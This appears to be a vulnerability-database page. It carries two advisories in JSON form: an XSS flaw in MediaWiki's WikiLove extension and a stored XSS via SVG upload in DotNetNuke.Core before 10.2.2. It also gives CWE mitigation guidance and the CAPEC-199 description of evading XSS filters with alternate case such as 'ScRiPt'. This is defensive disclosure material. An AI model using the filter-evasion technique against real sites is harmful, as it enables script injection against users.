    "nvd_published_at": "2026-04-07T19:16:43Z",
    "severity": "MODERATE"
  },
  "details": "Improper neutralization of alternate XSS syntax vulnerability in The Wikimedia Foundation Mediawiki - Wikilove Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Wikilove Extension: 1.43.7, 1.44.4, 1.45.2.",
  "id": "GHSA-cp48-9xx4-pmj6",
  "modified": "2026-04-07T21:32:39Z",
  "published": "2026-04-07T21:32:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22711"
    },
    {
      "type": "WEB",
      "url": "https://gerrit.wikimedia.org/r/q/Iab86209478a044504f5a6aea0d8c3d14f21c48b3"
    },
    {
      "type": "WEB",
      "url": "https://phabricator.wikimedia.org/T416502"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-FFQ7-898W-9JC4

Vulnerability from github – Published: 2026-04-10 20:42 – Updated: 2026-04-24 20:50
VLAI
Summary
DotNetNuke.Core has stored cross-site-scripting (XSS) via SVG upload
Details

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to version 10.2.2, a user could upload a specially crafted SVG file that could include scripts that can target both authenticated and unauthenticated DNN users. The impact is increased if the scripts are run by a power user. Version 10.2.2 patches the issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "DotNetNuke.Core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40321"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T20:42:48Z",
    "nvd_published_at": "2026-04-17T22:16:32Z",
    "severity": "HIGH"
  },
  "details": "DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to version 10.2.2, a user could upload a specially crafted SVG file that could include scripts that can target both authenticated and unauthenticated DNN users. The impact is increased if the scripts are run by a power user. Version 10.2.2 patches the issue.",
  "id": "GHSA-ffq7-898w-9jc4",
  "modified": "2026-04-24T20:50:37Z",
  "published": "2026-04-10T20:42:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-ffq7-898w-9jc4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40321"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dnnsoftware/Dnn.Platform"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v10.2.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "DotNetNuke.Core has stored cross-site-scripting (XSS) via SVG upload"
}

Mitigation
Implementation

Resolve all input to absolute or canonical representations before processing.

Mitigation
Implementation

Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.

Mitigation MIT-30.1
Implementation

Strategy: Output Encoding

  • Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.
  • The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
Mitigation MIT-43
Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Mitigation MIT-31
Implementation

Strategy: Attack Surface Reduction

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XmlHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

CAPEC-199: XSS Using Alternate Syntax

An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.